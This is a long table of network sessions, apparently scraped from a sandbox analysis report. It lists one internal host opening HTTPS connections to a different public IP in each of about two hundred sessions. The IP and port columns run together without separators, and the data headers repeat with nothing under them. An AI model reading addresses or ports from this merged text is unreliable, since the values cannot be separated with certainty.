                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12429192.168.2.145725017.231.252.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12430192.168.2.144952088.199.254.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12431192.168.2.1446034109.9.208.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12432192.168.2.1453060115.66.10.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12433192.168.2.145468694.44.154.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12434192.168.2.1460726159.195.199.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12435192.168.2.1457402202.161.223.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12436192.168.2.1444504167.114.107.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12437192.168.2.1433752223.253.144.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12438192.168.2.146000658.200.76.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12439192.168.2.145558036.224.88.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12440192.168.2.1455604172.254.51.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12441192.168.2.14505305.247.162.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12442192.168.2.1443972222.165.61.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12443192.168.2.1444690208.161.127.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12444192.168.2.1455752197.250.36.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12445192.168.2.1441072103.182.202.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12446192.168.2.1459914162.153.46.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12447192.168.2.1441362143.141.181.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12448192.168.2.14353865.53.181.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12449192.168.2.146002412.59.254.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12450192.168.2.1434012173.138.243.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12451192.168.2.1458610155.41.158.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12452192.168.2.144316440.207.182.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12453192.168.2.144591064.198.123.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12454192.168.2.145391060.163.117.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12455192.168.2.1460846210.200.12.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12456192.168.2.1432812123.3.148.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12457192.168.2.144940212.238.226.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12458192.168.2.1443410106.83.158.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12459192.168.2.144633252.215.187.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12460192.168.2.1452600192.91.179.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12461192.168.2.14443962.186.95.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12462192.168.2.144069066.19.184.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12463192.168.2.144482643.0.215.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12464192.168.2.1452368156.183.53.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12465192.168.2.1447886148.71.218.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12466192.168.2.145599474.242.126.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12467192.168.2.1458580169.172.133.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12468192.168.2.144001269.18.29.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12469192.168.2.1452860200.139.113.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12470192.168.2.1453532155.122.236.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12471192.168.2.1448078198.78.190.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12472192.168.2.1438912154.197.169.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12473192.168.2.1457336113.136.105.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12474192.168.2.144464663.68.5.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12475192.168.2.1459274106.11.180.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12476192.168.2.144397471.3.54.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12477192.168.2.14501704.69.55.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12478192.168.2.145192468.189.250.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12479192.168.2.1434024171.190.48.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12480192.168.2.145323412.183.69.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12481192.168.2.145052475.2.133.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12482192.168.2.145294631.175.247.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12483192.168.2.1449572156.175.222.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12484192.168.2.1458460155.93.118.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12485192.168.2.1446408200.84.228.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12486192.168.2.1460276141.157.69.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12487192.168.2.1451430183.71.254.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12488192.168.2.1457176143.177.48.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12489192.168.2.1444802150.87.125.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12490192.168.2.144670683.72.77.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12491192.168.2.1452926154.177.0.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12492192.168.2.145642641.3.16.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12493192.168.2.144453461.102.195.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12494192.168.2.1445022131.192.231.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12495192.168.2.1437480171.133.17.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12496192.168.2.1444966206.218.134.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12497192.168.2.145501235.153.118.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12498192.168.2.1455274111.4.16.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12499192.168.2.1443430131.179.223.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12500192.168.2.1457482135.55.118.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12501192.168.2.1452600134.21.217.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12502192.168.2.1441158120.138.12.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12503192.168.2.1437372160.27.43.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12504192.168.2.1453988107.162.78.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12505192.168.2.144272661.121.238.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12506192.168.2.1443552222.93.151.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12507192.168.2.1444278128.234.183.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12508192.168.2.145035069.71.236.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12509192.168.2.1448876213.29.183.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12510192.168.2.1444816105.92.118.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12511192.168.2.1437700219.104.68.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12512192.168.2.1457356145.56.193.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12513192.168.2.144648448.180.248.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12514192.168.2.1445738120.80.63.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12515192.168.2.145587425.157.4.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12516192.168.2.145145470.18.209.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12517192.168.2.1434936207.93.89.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12518192.168.2.1456464118.251.70.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12519192.168.2.1441808152.20.157.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12520192.168.2.143739259.121.222.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12521192.168.2.1453660212.12.138.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12522192.168.2.145418094.155.43.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12523192.168.2.1436498222.70.169.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12524192.168.2.1435620115.245.210.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12525192.168.2.144981252.147.125.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12526192.168.2.144852027.68.227.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12527192.168.2.1439768112.86.42.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12528192.168.2.1457714167.27.183.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12529192.168.2.1454798182.25.51.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12530192.168.2.1459388195.253.66.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12531192.168.2.145907414.234.42.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12532192.168.2.1444668137.187.186.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12533192.168.2.143498667.23.50.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12534192.168.2.143564880.24.218.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12535192.168.2.145338293.160.32.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12536192.168.2.14339528.5.171.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12537192.168.2.1432982159.75.190.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12538192.168.2.1451364206.207.244.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12539192.168.2.1457652213.44.199.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12540192.168.2.1460612140.59.192.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12541192.168.2.1448304207.163.141.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12542192.168.2.1458146142.207.215.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12543192.168.2.1442892103.160.137.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12544192.168.2.1433208118.128.113.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12545192.168.2.1436474103.36.253.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12546192.168.2.1443824221.151.157.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12547192.168.2.1445740183.56.74.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12548192.168.2.144802089.130.110.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12549192.168.2.1443206100.153.139.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12550192.168.2.1447838153.207.151.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12551192.168.2.144908299.251.190.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12552192.168.2.1436898124.176.168.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12553192.168.2.1450094120.243.56.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12554192.168.2.1445104189.201.95.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12555192.168.2.1433312115.88.246.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12556192.168.2.144612283.90.180.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12557192.168.2.1445978162.62.226.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12558192.168.2.1448362169.197.184.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12559192.168.2.1448476153.127.185.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12560192.168.2.1460010200.255.201.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12561192.168.2.144596239.57.20.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12562192.168.2.143931869.151.250.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12563192.168.2.145262064.8.164.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12564192.168.2.1449132170.119.227.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12565192.168.2.144513446.51.56.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12566192.168.2.1457126134.201.122.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12567192.168.2.143360076.20.106.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12568192.168.2.144998475.150.95.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12569192.168.2.143354058.108.16.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12570192.168.2.1450240185.108.138.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12571192.168.2.1457312178.4.180.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12572192.168.2.1433882156.235.166.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12573192.168.2.1440404133.98.208.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12574192.168.2.146093834.173.177.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12575192.168.2.1447570150.75.202.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12576192.168.2.1433574105.205.192.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12577192.168.2.1434308133.80.20.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12578192.168.2.1443244216.77.213.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12579192.168.2.144105485.162.82.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12580192.168.2.1437378160.182.194.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12581192.168.2.144966074.255.236.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12582192.168.2.145345891.156.224.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12583192.168.2.144096037.172.71.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12584192.168.2.145150693.185.97.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12585192.168.2.143284645.181.240.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12586192.168.2.143858681.134.55.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12587192.168.2.144835645.191.16.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12588192.168.2.1450266219.89.129.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12589192.168.2.1449234178.138.147.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12590192.168.2.1445376166.231.158.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12591192.168.2.1449834204.149.156.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12592192.168.2.1444526198.237.145.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12593192.168.2.1443942210.141.227.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12594192.168.2.1442114210.235.56.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12595192.168.2.1456612207.174.139.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12596192.168.2.145376253.227.19.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12597192.168.2.1441408179.255.52.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12598192.168.2.1440818165.187.226.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12599192.168.2.1446402116.219.24.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12600192.168.2.1452306162.65.126.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12601192.168.2.144269220.99.5.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12602192.168.2.144773423.100.66.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12603192.168.2.144429280.72.82.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12604192.168.2.144347050.61.117.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12605192.168.2.1443462118.162.65.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12606192.168.2.145613635.147.195.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12607192.168.2.1440886144.156.242.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12608192.168.2.1434310203.196.185.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12609192.168.2.1443912188.245.123.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12610192.168.2.1443154208.219.131.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12611192.168.2.144094652.234.177.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12612192.168.2.145473634.146.37.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12613192.168.2.1438240206.76.95.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12614192.168.2.1455948146.89.0.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12615192.168.2.1452394141.184.241.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12616192.168.2.145308217.230.209.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12617192.168.2.144772044.97.117.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12618192.168.2.1440566201.115.85.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12619192.168.2.1454392223.56.195.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12620192.168.2.146044450.17.35.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12621192.168.2.1456482206.199.74.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12622192.168.2.145254012.194.3.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12623192.168.2.1458040169.59.2.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12624192.168.2.1438558122.168.52.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12625192.168.2.1449918164.175.103.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12626192.168.2.1437768173.98.72.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12627192.168.2.144626895.164.119.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12628192.168.2.145859684.142.56.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12629192.168.2.1434350164.235.150.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12630192.168.2.1446632133.184.32.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12631192.168.2.146028092.83.62.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12632192.168.2.143641819.235.131.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12633192.168.2.1443340200.20.138.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12634192.168.2.1444942128.42.204.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12635192.168.2.144500647.190.222.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12636192.168.2.1437494166.181.98.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12637192.168.2.145755281.68.56.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12638192.168.2.144103051.61.214.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12639192.168.2.1434110198.244.200.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12640192.168.2.1455482217.61.45.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12641192.168.2.1457422167.24.34.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12642192.168.2.1448286166.64.165.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12643192.168.2.1447526104.109.76.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12644192.168.2.1453084163.24.144.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12645192.168.2.144495036.2.221.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12646192.168.2.1437926149.21.177.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12647192.168.2.144888043.73.147.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12648192.168.2.145187843.100.122.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12649192.168.2.145105671.226.45.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
